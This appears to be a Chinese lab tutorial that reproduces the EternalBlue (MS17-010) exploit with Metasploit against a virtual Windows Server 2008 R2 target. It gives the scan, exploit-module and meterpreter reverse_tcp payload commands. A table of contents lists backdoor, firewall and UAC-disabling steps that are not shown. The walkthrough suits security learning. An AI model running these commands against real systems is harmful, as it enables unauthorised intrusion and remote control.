永恒之蓝漏洞复现及上传后门程序

目录

1.安装靶机和攻击机

2.永恒之蓝复现

 3.永恒之蓝利用之远程桌面登录。

 4.远程桌面登录遇到问题

4.1密码策略

4.2支不支持远程桌面

 5.关闭主机防护策略并开启后门

5.1查看用户、密码

5.2创建防火墙规则

5.3关闭UAC

 5.4开启默认共享

5.5使用 use exploit/windows/smb/psexec

5.5.1psexec简单了解

5.5.2使用具体步骤

 6.上传后门

6.1上次后门程序

 6.2设置键值


1.安装靶机和攻击机

首先自己是在虚拟机完成的 靶场镜像地址MSDN, 我告诉你 - 做一个安静的工具站,我选择的win server 2008  R2 这里记得在安装虚拟机的时候选择桥接模式,这样你的虚拟机和物理机或者其他虚拟机都是一个网段的。

kali的下载地址:Get Kali | Kali Linux  在虚拟机里面直接选择打开就可以了。

 攻击机 kali ip是192.168.3.138

靶机 win server 2008  R2  ip是192.168.3.147

2.永恒之蓝复现

1.首先知道你靶机和攻击机的IP地址

 

2.可以kali里面 用nmap扫描靶机开了那些端口,可以看到开了135,445,4915这些端口开放。这个命令会扫一下常用的端口是否开放哦

3.输入msfdb run 进入msf中,这利每次都会出现不一样的图案,感觉有种小惊喜。这次是一个鸭子。

 4.开始搜索ms17_010  命令 search ms17_010

 5.先使用aux模块扫描靶机有无漏洞  步骤如下

第一步 使用扫描模块 use auxiliary/scanner/smb/smb_ms17_010 

第二步 查看那些参数需要设置 show options

第三步 设置靶机ip set RHOSTS 192.168.3.147

第四步 运行 run

如果看到Host is likely VULNERABLE to MS17-010! - Windows Server 2008 HPC Edition 7600 x64 (64-bit)表示该靶机很容易受到ms17-010的攻击

 6.开始利用exploit模块进行攻击了。

第一步 使用攻击模块 use exploit/windows/smb/ms17_010_eternalblue

第二步 查看那些参数需要设置 show options

第三步 设置靶机ip set RHOSTS 192.168.3.147,

不需要设置payloads 因为我的kali自动就有设置好了,主要设置是攻击机的IP地址和端口,因为要建立会话,没有对象怎么谈恋爱呢。如果需要改动自己再设置。(怕有的人不会设置补充一下,set payload windows/x64/meterpreter/reverse_tcp.后面你跟你要使用的payload就可以了,可以通过shows payload查看所以payload)

第四步 运行 run

 7.看到这个就是攻击成功了。建立了一个会话。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值